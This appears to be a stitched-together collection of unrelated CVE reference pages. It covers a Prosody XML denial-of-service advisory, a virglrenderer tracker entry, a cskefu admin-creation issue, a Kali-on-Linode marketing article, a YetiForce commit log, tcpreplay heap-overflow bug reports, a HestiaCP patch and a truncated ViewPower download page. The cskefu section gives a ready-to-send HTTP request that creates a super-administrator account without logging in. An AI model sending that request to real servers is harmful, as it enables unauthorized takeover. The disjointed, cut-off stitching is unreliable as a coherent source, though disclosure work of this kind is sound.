It was discovered that an internal Prosody library to load XML based on libexpat does not properly restrict the XML features allowed in parsed XML data. Given suitable attacker input, this results in expansion of recursive entity references from DTDs (CWE-776). In addition, depending on the libexpat version used, it may also allow injections using XML External Entity References (CWE-611).

Prosody XMPP server advisory 2022-01-13 (Remote Denial of Service)

Project

Prosody XMPP server

URL

https://prosody.im/

Date

2022-01-13

**References**

*   Advisory (HTML): https://prosody.im/security/advisory\_20220113/
*   Advisory (text): https://prosody.im/security/advisory\_20220113.txt
*   Link to patch: https://prosody.im/security/advisory\_20220113/1.patch
*   Instructions for testing a deployment (will only be published a few days after this announcement): https://prosody.im/security/advisory\_20220113/instructions.txt

This advisory details a new security vulnerability discovered in the Prosody.im XMPP server software. A fix for this issue is available in Prosody 0.11.12, we advise everyone affected to upgrade.

**Unauthenticated Remote Denial of Service Attack in the WebSocket interface**

CVE

CVE-2022-0217

CVSS

7.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:F/RL:X/RC:C/CR:X/IR:X/AR:X/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:N/MI:N/MA:H)

CWEs

CWE-776, CWE-20, possibly CWE-611

Affected versions

All versions with support for WebSockets

Fixed versions

0.11.12

**Description**

It was discovered that an internal Prosody library to load XML based on libexpat does not properly restrict the XML features allowed in parsed XML data. Given suitable attacker input, this results in expansion of recursive entity references from DTDs (CWE-776). In addition, depending on the libexpat version used, it may also allow injections using XML External Entity References (CWE-611). The Prosody team did not evaluate if and which versions are affected by external entity reference expansion.

The internal prosody API was meant for local access of trusted XML data, but has since started to be used for network-facing applications. An audit of usages of this API in prosody code revealed that it is used by the WebSockets module, which allows to use XMPP over WebSockets.

As the WebSockets module needs to parse XML in order to start a session before authentication, the lack of restriction of available XML features can be used in a Billion Laughs Attack in order to cause excessive resource consumption and denial of service. Because Prosody does not yield control to other connections while processing a fully received WebSocket frame, this also results in Denial of Service.

This internal API is _not_ used to handle XML on normal XMPP connections or the BOSH interface, which are hence not affected by this vulnerability.

**Affected configurations**

All Prosody servers with WebSockets enabled and the WebSockets endpoint exposed directly to any untrusted party are affected.

**Mitigating factors**

WebSockets are not enabled by default.

**Workaround**

**The recommended mitigation is to upgrade to Prosody 0.11.12, released on 2022-01-13.** Follow the manual patching instructions only if you cannot immediately upgrade.

This advisory has a patch attached, it can be applied to any Prosody installation from the 0.11 series. The patch is already applied in 0.11.12. If the patch is applied manually and your Prosody installation is managed by a package manager (such as apt or dnf), a future update will revert the change.

To do so, open a normal shell on the server and locate the file xml.lua. It should exist in a directory structure util/xml.lua.

On Debian, it is found in

    /usr/lib/prosody/util/xml.lua

on 0.11.x or

    /usr/share/lua/5.1/prosody/util/xml.lua

on trunk

Navigate to the directory containing the xml.lua file and apply the attached patch using patch -p2 < 1.patch.

*   Link to patch: https://prosody.im/security/advisory\_20220113/1.patch

Now restart Prosody. There is no known-to-be-safe way to reload the util/xml.lua file without a complete Prosody restart.

After the restart, this vulnerability is fixed.

If neither patching nor upgrading is an option, it is possible to unload the websocket module on Prosody trunk using:

    prosodyctl shell module unload websocket

On 0.11.x and earlier, you need to

*   use module:unload("websocket") from the telnet console, OR
*   unload the module via an XMPP Ad-Hoc command OR
*   if neither of these online ways are available, remove the module from the configuration and restart prosody.

However, note well that third-party modules may also use the vulnerable internal APIs to parse XML. Unloading websocket does not protect those other modules; only the patch or the upgrade can do that.

**Fix**

This issue is fixed in Prosody 0.11.12 by restricting the available XML features in the internal XML API.

**Attribution**

The issue was discovered during internal code review by Matthew Wild during the development of another feature. The patch was developed by Jonas Schäfer. A proof-of-concept exploit was developed by Jonas Schäfer and Kim Alvefur and will be published soon to allow administrators to check their instances.

**Timeline**

2022-01-10: Discovery of the issue, development of an exploit as well as an initial patch. Sharing of this information with Jitsi and Snikket developers. Heads-up sent to the Snikket group chat.

2022-01-11: Refinement of the patch, release preparation. Heads-up sent to the Prosody group chat. Patch shared confidentially with Jitsi.

2022-01-12: Continued release preparation, notification of distros@.

2022-01-13: Coordinated Snikket and Prosody release with a fix, publication of the advisory.

CVE-2022-0217: Prosody XMPP server advisory 2022-01-13 (Remote Denial of Service)

A flaw was found in the VirGL virtual OpenGL renderer (virglrenderer). The virgl did not properly initialize memory when allocating a host-backed memory resource. A malicious guest could use this flaw to mmap from the guest kernel and read this uninitialized memory from the host, possibly leading to information disclosure.

**Name**

CVE-2022-0175

**Description**

memory initialization issue in vrend\_resource\_alloc\_buffer() can lead to info leak

**Source**

CVE (at NVD; CERT, LWN, oss-sec, fulldisc, bugtraq, EDB, Metasploit, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, Mageia, GitHub advisories/code/issues, web search, more)

**Vulnerable and fixed packages**

The table below lists information on source packages.

Source Package

Release

Version

Status

virglrenderer (PTS)

buster

0.7.0-2

fixed

bookworm, sid, bullseye

0.8.2-5

fixed

The information below is based on the following data on fixed versions.

Package

Type

Release

Fixed Version

Urgency

Origin

Debian Bugs

virglrenderer

source

(unstable)

(not affected)

**Notes**

\- virglrenderer <not-affected> (Introduced in 0.9.0 with refactor)  
https://bugzilla.redhat.com/show\_bug.cgi?id=2039003  
https://gitlab.freedesktop.org/virgl/virglrenderer/-/merge\_requests/654  
Code refactored in https://gitlab.freedesktop.org/virgl/virglrenderer/-/commit/7899e057327848300b18d8f03aa3789e00ed0221 (0.9.0)  
Fixed by: https://gitlab.freedesktop.org/virgl/virglrenderer/-/commit/b05bb61f454eeb8a85164c8a31510aeb9d79129c

CVE-2022-0175: CVE-2022-0175

Insecure permissions in cskefu v7.0.1 allows unauthenticated attackers to arbitrarily add administrator accounts.

**概述**

存在添加管理员接口，调用该接口时没有对当前用户进行校验，导致未登录状态下可添加管理员账户。  
There is an interface to add an administrator. When calling this interface, the current user is not verified, so that an administrator account can be added when not logged in.

**数据包（payload）：**

GET /addAdmin?username\=admin666&password\=admin666123&email\=admin666@admin6666.com&mobile\=17777777776&superadmin\=true HTTP/1.1
Host: localhost
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,\*/\*;q\=0.8
Accept\-Language: zh\-CN,zh;q\=0.8,zh\-TW;q\=0.7,zh\-HK;q\=0.5,en\-US;q\=0.3,en;q\=0.2
Accept\-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade\-Insecure\-Requests: 1
Sec\-Fetch\-Dest: document
Sec\-Fetch\-Mode: navigate
Sec\-Fetch\-Site: none
Sec\-Fetch\-User: ?1
Cache\-Control: max\-age\=0

\*\* 测试截图（Test screenshot）： \*\*  

根据给出的URL  
According to the given URL  
http://localhost/?schema=http&port=80&hostname=localhost&subtype=user&maintype=apps&typename=methodName&orgi=cskefu&webimport=8036&sessionid=f8dbdd6d51dd44788ccad36c02e7958b&models=cca&models=chatbot&models=report&models=entim&models=contacts&ip=172.18.0.1&userExpTelemetry=on

跳转至管理界面  
Jump to the management interface  

**漏洞分析（Vulnerability analysis）**  
漏洞源码（Vulnerability source code）：

 @RequestMapping("/addAdmin")
    @Menu(type = "apps", subtype = "user", access = true)
    public ModelAndView addAdmin(HttpServletRequest request, HttpServletResponse response, @Valid User user) {
        String msg = "";
        msg = validUser(user);
        if (StringUtils.isNotBlank(msg)) {
            return request(super.createView("redirect:/register.html?msg=" + msg));
        } else {
            user.setUname(user.getUsername());
            user.setAdmin(true);
            if (StringUtils.isNotBlank(user.getPassword())) {
                user.setPassword(MainUtils.md5(user.getPassword()));
            }
            user.setOrgi(super.getOrgi());
            userRepository.save(user);
        }
        ModelAndView view = this.processLogin(request, user, "");
        return view;
    }

    private String validUser(User user) {
        String msg = "";
        User tempUser = userRepository.findByUsernameAndDatastatus(user.getUsername(), false);
        if (tempUser != null) {
            msg = "username\_exist";
            return msg;
        }
        tempUser = userRepository.findByEmailAndDatastatus(user.getEmail(), false);
        if (tempUser != null) {
            msg = "email\_exist";
            return msg;
        }
        tempUser = userRepository.findByMobileAndDatastatus(user.getMobile(), false);
        if (tempUser != null) {
            msg = "mobile\_exist";
            return msg;
        }
        return msg;
    }

addAdmin接口未进行权限校验，未登录状态可直接调用  
The addadmin interface does not perform permission verification, and can be called directly in the unregistered state

增加用户前，判断传入的用户是否有效  
Before adding users, judge whether the incoming users are valid  

为了顺利到达最后一个return，传入的username，email，mobile都必须为数据库中的唯一值  
n order to successfully reach the last return, the username, email and mobile passed in must be unique values in the database  

当返回的msg为空时，我们就可以继续增加用户的操作，且将添加的用户设置为管理员  
When the returned MSG is empty, we can continue to add users and set the added users as administrators  

**操作系统**

*   macOS or Mac OSX
*   Windows
*   Linux(Debian, CentOS, Ubuntu, etc.)

**代码版本**

代码版本 <= 7.0.1

**祝福与不祝福**

春松客服之所以开源，是基于这样一种信念：爱人也是爱己，利他也是利己。  
对人和人美好关系的向往，对人潜力的信任。让我们相信因春松客服而受益的人，会回报给春松客服开源社区，我们所有贡献者基于共赢的信念合作。  
回报方式包括：提交 PR、购买春松客服相关的付费产品和服务等。

因春松客服受益，而不回报开源社区的用户，我们不欢迎使用春松客服：我们开源并不是为了你们，你们是不被祝福的。

**Open Source for the World**

CVE-2022-36521: 【安全漏洞】前台未授权增加管理员账号 · Issue #724 · chatopera/cskefu

Alternative cloud providers offer streamlined capabilities for penetration testing, including more accessible tools, easy deployment, and affordable pricing.

Cloud data breaches are on the rise. In 2022, 45% of organizations reported a breach or compliance audit failure, representing a 5% increase from the year before. And just 11% reported that more than 80% of their sensitive data in the cloud is encrypted. With the help of red-team penetration testing, infosec developers have the ability to patch vulnerabilities before they reach end users. And as attacks continue to expand, red-team activities in the cloud are an absolute must for most organizations, and take up a growing chunk of infosec developers' time.

As a crucial layer of protection for businesses, infosec teams need technologies that make their work easier. Yet today, many cloud providers make security complex by overcomplicating either the deployment of required infrastructure or the pricing structure. This has to change. It's time for cloud providers to empower infosec developers with the right tools, platforms, and pricing to support essential testing and security work. Or risk breaches that cost money, reputation, and time.

**Companies Deserve Full Capabilities and Affordable Costs**

Security starts with the right strategy and tool set. When it comes to red-team activities, Kali is a top choice. A lightweight Linux distribution, Kali is open source and Debian-based, with a full suite of security testing tools. But Kali can be hard to use on some of the most popular cloud providers, like Amazon Web Services (AWS).

For one thing, deploying Kali Linux onto a cloud instance can be tedious and time consuming, especially if installing directly from an ISO using workarounds or exporting from a local VM. For example, though a penetration tester can set up a Kali Linux instance on Amazon's cloud, it's only available as an Amazon Machine Image (AMI) that runs Kali Linux on the Amazon Marketplace. This image doesn't include the full range of Kali's capabilities.

In addition to a challenging manual setup process, companies also need to grapple with pricing complexity — a problem that doesn't just affect finance teams but trickles down to developers too. Depending on the scope, size, and thoroughness of the engagement, penetration testing may require many instances and significant amounts of egress. On major cloud providers, these needs can run up a large bill. On top of that, pricing complexity may make these costs difficult to accurately estimate, placing an unfair responsibility on infosec professionals, developers, and business owners that may be expected to foresee (and prevent) high price tags.

While enterprise companies may not be concerned about these factors — they may have massive infosec teams to handle setup and deep pockets to deal with costs — small businesses will likely be more wary. As they grapple with a talent shortage and relatively tight budgets, they need partners that can support them in a different, more holistic way. Enter alternative cloud providers.

Though Kali is widely available, deploying it with a partner that offers deeper functionality and more thorough support at a fair cost is simply more practical, especially for SMBs. For security professionals in the cloud space to get the most of Kali, it must be offered as an officially supported distribution that can easily be deployed on any cloud instance. This ensures that the full range of testing opportunities and configurations supported by Kali Linux can easily run in the cloud. Akamai Linode offers Kali this way, giving end users access not only via the distribution but also as an app in Linode's marketplace. Another key differentiator is that alternative providers typically offer a higher level of support than other providers, helping SMBs tackle that tough initial setup, often with no added costs.

Pricing in general, not just for support, is more accessible through alternative providers as well. These players not only have more predictable, transparent costs thanks to flat rates, but some — like Linode — have generous transfer allowances and comparatively low overage costs. That's game-changing for penetration testers that deal with plenty of egress. Without worry about incurring significant extra costs, they can freely run the testing they need to protect their organizations.

**Consider Alternative Cloud Providers for Security Testing**

Every organization using cloud, no matter how small, should be doing security testing: cloud misconfiguration is the initial attack vector for 15% of all data breaches. And with breaches costing companies as much as $4 million dollars, they simply can't afford the risk.

As threats continue to grow, thorough and well-honed penetration testing is more important now than ever. And infosec teams need support. Let's arm these vital teams with key tools, easier deployment, and clearer, more affordable pricing schemes.

**About the Author**

    

Billy Thompson is a Solutions Engineering Manager on Akamai, Linode Compute, helping customers design portable architectures, and deploy them at scale for technical and business teams. Billy holds a degree in information security and has a special interest in IaC, Kubernetes, big data engineering, and Python and Rust programming languages. He is a longtime Arch Linux user and vegan, and never knows which to tell people first. Outside of work, he studies jujitsu, muay thai, and boxing. He also volunteers at his home for fostering and acclimating rescue dogs.

For Penetration Security Testing, Alternative Cloud Offers Something Others Don't

Cross-site Scripting (XSS) - Stored in GitHub repository yetiforcecompany/yetiforcecrm prior to 6.4.0.

Permalink

Browse files

YetiForce CRM ver. 6.4.0 (#16359)

\* Added improvements in record collector

\* Integration with UaYouControl.php (#16293)

Co-authored-by: Mariusz Krzaczkowski <m.krzaczkowski@yetiforce.com>

\* Integration with UaYouControl.php (#16293)

\* Add external link to NoBrregEnhetsregisteret. (#16292)

\* Add external link to NoBrregEnhetsregisteret. #16292

\* Add NorthData to RecordCollectors. (#16278)

\* Add NorthData to RecordCollectors.

\* Change docs.

Co-authored-by: Mariusz Krzaczkowski <m.krzaczkowski@yetiforce.com>

\* Fix #16311

\* Added conditions wizard for 'Update related record' workflow action

\* Add NorthData to RecordCollectors. (#16278)

\* Code improvements

\* Added improvements in record collector

\* Zefix integraion \[in progress\] (#16281)

\* Zefix integraion \[in progress\]

\* ChZefix integration.

Co-authored-by: Mariusz Krzaczkowski <m.krzaczkowski@yetiforce.com>

\* Improved workflow action

\* Added improvements in record collector

\* Improvements in the store

\* Update RecordCollector tests

\* Code improvements

\* Improved ConfReport

\* languages/en-US/Other/RecordCollector.json

\* Improved change module type

\* Improved default dashboard in api portal

\* Fix Send PDF workflow task

\* Improved default dashboard in api

\* Fixed attachments in 'Emails to send' panel

\* lib\_roundcube 0.3.0 Roundcube Webmail 1.6.0

\* tests

\* tests

\* Update tests.yml

\* Added improvements in record collector

\* tests/setup/dependency.sh

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* Code improvements

\* Update dependencies

\* Added minor improvements

\* tests

\* Added improvements in record collector

\* Added improvements in record collector

\* Added minor improvements

\* Added minor improvements

\* Added minor improvements

\* Improved import file button

\* Improved imap connection

\* Fix #16317 - list view entries count

\* Added minor code improvements

\* Improved menu items

\* Added improvements in record collector

\* Fix gantt view (#15772)

\* Added improvements in record collector

\* Added improvements in record collector

\* Added improvements in record collector

\* Updated graphics in store

\* Update install translations

\* Update fonts

\* Improved OSSMail template

\* Updated graphics in store

\* Update fonts

\* tests

\* tests Validator

\* Update icons

\* Improved widgets permissions (#15613)

\* Increase scrolling speed (#15031)

\* Added tracking to media management

\* Added improvements in record collector

\* Added improvements in record collector

\* Added improvements in record collector

\* Added minor code improvements

\* tests

\* Added minor code improvements

\* Fixed #15164 (#16319)

\* Some changes in Import module (#16318)

\* Code formatting

\* Added improvements in record collector

\* Change the library "sonata-project / google-authenticator" to "pragmarx/google2fa"

\* Update dependencies

\* Update dependencies

\* Updated \*.min and \*.map files

\* Change the library "sonata-project / google-authenticator" to "pragmarx/google2fa"

\* Added minor improvements in Composer::install

\* Update dev dependency

\* Added dropdown button to record collectors (#16322)

\* Corrected  Record collectors table width (#16323)

\* Fixed #15183 modulesMapRelatedFields don\`t work correct for multipicklist

\* Added minor improvements in Credits

\* Fix edit view header links

\* Improved Inventory panel and PDF widget

\* Added improvements in record collector

\* Added improvements in record collector

\* Update install translations

\* #16282 Improved the handler from getting coordinates to the map

\* Added minor code improvements

\* Fixed getting reference module in inventory name field (#16329)

\* Missing icons update

\* Improved tree field type

\* Improved tests and some code

\* Fix tree field type

\* Fix scheme for tree data table

\* Improved switch users

\* Improved YetiForce CLI

\* \[PROD\](renovate) Update dependency github/super-linter to v4.9.6 (#16324)

Co-authored-by: renovate\[bot\] <29139614+renovate\[bot\]@users.noreply.github.com>

\* Bump giggsey/libphonenumber-for-php from 8.12.52 to 8.12.53 (#16331)

Bumps \[giggsey/libphonenumber-for-php\](https://github.com/giggsey/libphonenumber-for-php) from 8.12.52 to 8.12.53.
- \[Release notes\](https://github.com/giggsey/libphonenumber-for-php/releases)
- \[Commits\](giggsey/libphonenumber-for-php@8.12.52...8.12.53)

---
updated-dependencies:
- dependency-name: giggsey/libphonenumber-for-php
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot\[bot\] <support@github.com>

Co-authored-by: dependabot\[bot\] <49699333+dependabot\[bot\]@users.noreply.github.com>

\* Improved switch users

\* Improved switch users

\* Unused code has been removed

\* Fix tree field type

\* Added improvements in record collector

\* Improved integration with DAV

\* Improved conditions wizard for 'Update related record' workflow action

\* Fixed focus to search text field when click on select2 drop down in modal window

\* Added improvements in record collector

\* Added minor code improvements

\* Improved ConfReport

\* Improved .htaccess

\* Added minor code improvements

\* Improved ConfReport

\* Fix icon on tree field type and change icon management view

\* Removed unused code. "Is added" - condition in workflows (#16321)

\* Correct setting of check boxes of Inventory boolean fields depending on their values. (#16326)

\* Update Inventory.js
Now the check-boxes of Inventory boolean fields will be set correctly regarding to their content.

\* README.md (#16332)

\* Improve inventory auto fill

\* Improved getting data from smtp (#16334)

\* Fixed #13136 (#16335)

\* Improved DB structure for map table cache

\* Improved updating payment status (#16327)

\* Improved updating payment status

\* Corrected translation (#16336)

\* Removed translation (#16337)

\* A functionality has been added to unlock e-mail accounts

\* Fix #13486

\* Update dependencies

\* mbstring.func\_overload

\* Added priority to CalendarActivities and OverdueActivities dashboard … (#16276)

\* Added priority to CalendarActivities and OverdueActivities dashboard widgets

\* Added improvement

\* Hidden icon for previewing replies in comments (#16339)

\* The display of the multi email field has been improved

\* Added working time counter widget. (#16316)

\* Added working time counter widget.

\* Added translation

\* Added improvements

\* Removed varialbe

\* Corrected comment

\* Added title to buttons

\* Added type to variable

\* Removed redundant characters

\* Added working time counter widget. #16316

\* Added minor improvements

\* Improoved dashboard titles

\* Updated \*.min and \*.map files

\* Added minor improvements in languages

\* Updated translation

\* Improvements have been added to the integration with WAPRO ERP

\* Update install translations

\* Update translations

\* Update translations

\* Added improvements in record collector

\* Added improvements in record collector

\* Improved input data cleanup

\* Improved RSS

\* Improved Rss

\* Update all Yarn dependencies (2022-08-15) (#16344)

Co-authored-by: depfu\[bot\] <23717796+depfu\[bot\]@users.noreply.github.com>

\* Added improvements in record collector

\* Improvements in the mechanism of generating PDF files

\* YetiForcePDF update v0.1.40 & Update dependencies

\* Improved some config templates

\* Added minor improvements

\* Remove unnecessary code

\* .github/workflows/actions.yml

\* .github/workflows/actions.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* Improved Db importer/updater

\* Added buttons to the Working hours counter widget (#16340)

\* Added buttons to the Working hours counter widget

\* Added translations

\* Improved widget

\* Added button lock when starting timing

\* Update translations

\* Added missing translation

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* Added missing translation

\* .github/workflows/tests.yml

\* Removed Translation (#16347)

Co-authored-by: Radosław Skrzypczak <r.skrzypczak@yetiforce.com>

\* Update install translations

\* Added minor improvement in get actual version of PHP

\* Update install translations

\* Updated \*.min and \*.map files

\* Redundant code has been removed

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* Improved RSS

\* Added improvements

\* Update DEV dependencies

\* Fix Completions initialization in comments widget (#16348)

\* Update fonts

\* Fixed sending files in API for PUT method

\* Update DEV dependencies

\* Improved valid of time in Business Hours (#16351)

\* Improved executing workflow when an unsupported operator is selected (#16352)

\* Improved executing workflow when an unsupported operator is selected

\* Improved getting translation (#16350)

\* Improved Importer

\* Improved working time counter widget

\* Improved api

\* Expansion of the tests

\* Expansion of the tests

\* tests

\* Update DEV dependencies

\* Improved Rss

\* tests

\* Value display secured

\* Added improvements

\* Improved index name

\* Improved validation of quantity field (#16355)

\* Improved validation of quantity field

\* Improved code

\* Add missing picklist dependencies

\* Added  validation whether at least one business day has been selected in the Business hours module (#16356)

\* Compile js

\* Moved swagger file

\* Improved swagger generating functions

\* Added minor improvements

\* Fixed issue with date format

\* Added improvements

\* Fixed a bug when selecting all users in the calendar quick edit view (#16357)

\* Improved swagger generating functions

\* Added improvements

\* Added improvements

\* Added improvements

\* Improved Address Search panel

\* Improved Emails to send panel

\* Fix action name

\* Fix description in docBlock

\* tests/Settings/ApiAddress.php

\* Compile js

\* tests/Settings/ApiAddress.php

\* tests/Settings/ApiAddress.php

\* Remove html unnecessary class

\* Fixed #14266 (#16349)

\* \[PROD\](renovate) Update debian Docker tag to v11 (#16341)

Co-authored-by: renovate\[bot\] <29139614+renovate\[bot\]@users.noreply.github.com>

\* Improved anonymization

\* Added improvements

\* Update install translations

\* Improved config class

\* Added improvements

\* Improved generatedtype for some fields

\* Fixed #15631 (#16358)

\* Added improvements

\* Improved block sequence

\* 6.4.0

Co-authored-by: rembiesa <103192653+rembiesa@users.noreply.github.com>
Co-authored-by: Radosław Skrzypczak <r.skrzypczak@yetiforce.com>
Co-authored-by: Adrian Koń <a.kon@yetiforce.com>
Co-authored-by: bmankowski <bmankowski@gmail.com>
Co-authored-by: Arek Solek <arkadiusz\_s9887@wp.pl>
Co-authored-by: renovate\[bot\] <29139614+renovate\[bot\]@users.noreply.github.com>
Co-authored-by: dependabot\[bot\] <49699333+dependabot\[bot\]@users.noreply.github.com>
Co-authored-by: Jared Ramon Elizan <elizanjaredr@gmail.com>
Co-authored-by: depfu\[bot\] <23717796+depfu\[bot\]@users.noreply.github.com>

*   Loading branch information

CVE-2022-1340: YetiForce CRM ver. 6.4.0 (#16359) · YetiForceCompany/YetiForceCRM@2c14baa

The component tcprewrite in Tcpreplay v4.4.1 was discovered to contain a heap-based buffer overflow in get_l2len_protocol at common/get.c:344. NOTE: this is different from CVE-2022-27941.

You are opening a _bug report_ against the Tcpreplay project: we use  
GitHub Issues for tracking bug reports and feature requests.

If you have a question about how to use Tcpreplay, you are at the wrong  
site. You can ask a question on the tcpreplay-users mailing list  
or on Stack Overflow with \[tcpreplay\] tag.  
General help is available here.

If you have a build issue, consider downloading the latest release

Otherwise, to report a bug, please fill out the reproduction steps  
(below) and delete these introductory paragraphs. Thanks!

**Describe the bug**  
A clear and concise description of what the bug is.  
There is a heap-overflow bug in get\_ipv6\_next. Different from #716 (The crash point is in line 322, ntohs(eth_hdr->ether_type);), this bug is triggered in line 344 (pktdata[l2_net_off] >> 4).

**To Reproduce**  
Steps to reproduce the behavior:

1.  export CC=clang && export CFLAGS="-fsanitize=address -g"
2.  ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8
3.  tcpprep --auto=bridge --pcap=POC --cachefile=/dev/null

**Expected behavior**  
A clear and concise description of what you expected to happen.  
The program does not crash.

**Screenshots**  
If applicable, add screenshots to help explain your problem.  

**System (please complete the following information):**

*   OS: Debian
*   OS version: buster
*   Tcpreplay Version: 09f0774

**Additional context**  
Add any other context about the problem here.  
**POC**  
poc.zip

CVE-2022-37048: [Bug] heap-overflow in get.c:344 · Issue #735 · appneta/tcpreplay

The component tcpprep in Tcpreplay v4.4.1 was discovered to contain a heap-based buffer overflow in parse_mpls at common/get.c:150. NOTE: this is different from CVE-2022-27942.

You are opening a _bug report_ against the Tcpreplay project: we use  
GitHub Issues for tracking bug reports and feature requests.

If you have a question about how to use Tcpreplay, you are at the wrong  
site. You can ask a question on the tcpreplay-users mailing list  
or on Stack Overflow with \[tcpreplay\] tag.  
General help is available here.

If you have a build issue, consider downloading the latest release

Otherwise, to report a bug, please fill out the reproduction steps  
(below) and delete these introductory paragraphs. Thanks!

**Describe the bug**  
A clear and concise description of what the bug is.  
There is a heap-overflow bug in get.c:150. This bug is different from #719 that crashes in get.c:118.

**To Reproduce**  
Steps to reproduce the behavior:

1.  export CC=clang && export CFLAGS="-fsanitize=address -g"
2.  ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8
3.  ./src/tcpprep --auto=bridge --pcap=POC --cachefile=/dev/null

**Expected behavior**  
A clear and concise description of what you expected to happen.  
The program does not crash.

**Screenshots**  
If applicable, add screenshots to help explain your problem.  

**System (please complete the following information):**

*   OS: Debian
*   OS version: buster
*   Tcpreplay Version: 09f0774

**Additional context**  
Add any other context about the problem here.  
**POC**  
poc.zip

CVE-2022-37049: [Bug] heap-overflow in get.c:150 · Issue #736 · appneta/tcpreplay

The component tcprewrite in Tcpreplay v4.4.1 was discovered to contain a heap-based buffer overflow in get_ipv6_next at common/get.c:713. NOTE: this is different from CVE-2022-27940.

You are opening a _bug report_ against the Tcpreplay project: we use  
GitHub Issues for tracking bug reports and feature requests.

If you have a question about how to use Tcpreplay, you are at the wrong  
site. You can ask a question on the tcpreplay-users mailing list  
or on Stack Overflow with \[tcpreplay\] tag.  
General help is available here.

If you have a build issue, consider downloading the latest release

Otherwise, to report a bug, please fill out the reproduction steps  
(below) and delete these introductory paragraphs. Thanks!

**Describe the bug**  
There is a heap-overflow bug in get\_ipv6\_next. Different from #718 (The crash point is in line 679, *((int*)((u_char *)exthdr + len))), this bug is triggered in line 713 (*((int*)((u_char *)exthdr + len)) > maxlen).

**To Reproduce**  
Steps to reproduce the behavior:

1.  export CC=clang && export CFLAGS="-fsanitize=address -g"
2.  ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8
3.  ./src/tcprewrite -o /dev/null -i POC

**Expected behavior**  
A clear and concise description of what you expected to happen.  
The program does not crash.

**Screenshots**  

**System (please complete the following information):**

*   OS: Debian
*   OS version: buster
*   Tcpreplay Version: 09f0774

**Additional context**  
**POC**  
poc.zip

CVE-2022-37047: [Bug] heap-overflow in get.c:713 · Issue #734 · appneta/tcpreplay

An issue was discovered in HestiaCP before v1.3.5. Attackers are able to arbitrarily install packages due to values taken from the pgk [] parameter in the update request being transmitted to the operating system's package manager.

Permalink

Browse files

Merge remote-tracking branch 'jaapmarcus/fix/prevent-install-non-cont…

…rolled-package' into main

*   Loading branch information

Kristan Kenney committed

Mar 30, 2021

2 parents 32ef8a2 + 9a1fccd commit 27556a9a43aeaf308b33be224c2e70f2011574e6

Showing **2 changed files** with **7 additions** and **0 deletions**.

*   *   v-update-sys-hestia
*   *   main.sh

@@ -32,6 +32,7 @@ source $HESTIA/conf/hestia.conf

  

# Checking arg number

check\_args '1' "$#" 'PACKAGE'

is\_hestia\_package "hestia,hestia-nginx,hestia-php" "$package"

  

# Perform verification if read-only mode is enabled

check\_hestia\_demo\_mode

@@ -1154,6 +1154,12 @@ multiphp\_default\_version() {

echo "$sys\_phpversion"

}

  

is\_hestia\_package(){

if \[ \-z "$(echo $1 | grep -w $2)" \]; then

check\_result $E\_INVALID "$2 package is not controlled by hestiacp"

fi

}

  

# Run arbitrary cli commands with dropped privileges

# Note: setpriv --init-groups is not available on debian9 (util-linux 2.29.2)

# Input:

**0 comments on commit 27556a9**

Please sign in to comment.

CVE-2021-30070: Merge remote-tracking branch 'jaapmarcus/fix/prevent-install-non-cont… · hestiacp/hestiacp@27556a9

upsMonitor in ViewPower (aka ViewPowerHTML) 1.04-21012 through 1.04-21353 has insecure permissions for the service binary that enable an Authenticated User to modify files, allowing for privilege escalation.

 ViewPower Management Software 

**ViewPowerHTML 1.04-21353** is an advanced UPS management software. It allows remote monitor and manage from one to multiple UPSs in a networked environment, either LAN or INTERNET. It can not only prevent data loss from power outage and safely shutdown systems, but also store programming data and scheduled shutdown UPSs.  

  

**Feature summary:**  
• Allows control and monitoring of multiple UPSs via LAN and INTERNET  
• Supports auto and manual online upgrade  
• User-friendly power analysis graph: event statistics, history data chart export  
• Real-time dynamic graphs of UPS data (voltage, frequency, load level, battery level)  
• Safely OS shutdown and protection from data loss during power failure  
• Warning notifications via audible alarm, broadcast, mobile messenger, and e-mail  
• Scheduled UPS on/off, battery test, programmable outlet control, and audible alarm control  
• Password security protection and remote access management  
• Supports multiple languages: English, Chinese, French, German, Spanish, Russian, Portuguese, Ukrainian, Italian, Polish, Czech, Turkish   Download the software according to your requested operation system in your computer system. Supported browser versions include IE browser (not support the version older than IE10), Google, Chrome, Firefox,. All browers should support html5.

Software Version

Type

Download Link

Supported OS

ViewPower Network Edition  

Software for Windows® (V.HTML 1.04-21353)

Windows® 7 / 8 / 10 (32-bit & x64-bit) / 11  
Windows® Server 2012 / 2016 / Windows SBS 2011

Windows XP 2003 /2008

Windows® Server 2019 (32-bit & x64-bit)

User Manual

Windows® 7 / 8 / 10 (32-bit & x64-bit) / 11  
Windows® Server 2012 / 2016 / 2019 (32-bit & x64-bit) Windows SBS 2011

Software for MAC x86-64 (V.HTML 1.04-21353) Intel Chip

Mac OS 10.6/10.7/10.8/10.9/10.10/10.11/10.12/10.13/10.14/10.15 /11.x (intel x64-bit)

Software for MAC x86-64 (V.HTML 1.04-21353) M1 Chip

Mac OS 11.x (M1)

Software for Linux  
(V.HTML 1.04-21353)

Graphic mode operation:

Linux Cent OS 5/ 6 / 7 (32-bit )  
Linux Debian 6.x/8.x/10.x (32bit)  
Linux Fedora 5/ 17 (32bit)  
Linux Mint 14.x/19.x (32bit)  
Linux OpenSUSE 10/ 11 / 12/ 13 (32bit)  
Linux RedHat Enterprise AS3, AS5 AS6 (32bit)  
Linux RedHat Enterprise 5/8/9 (32-bit)  
Linux Ubuntu 8/ 9/ 10/ 12/ 14/ 15/ 16 (32-bit )  

Text mode operation:

Graphic mode operation:

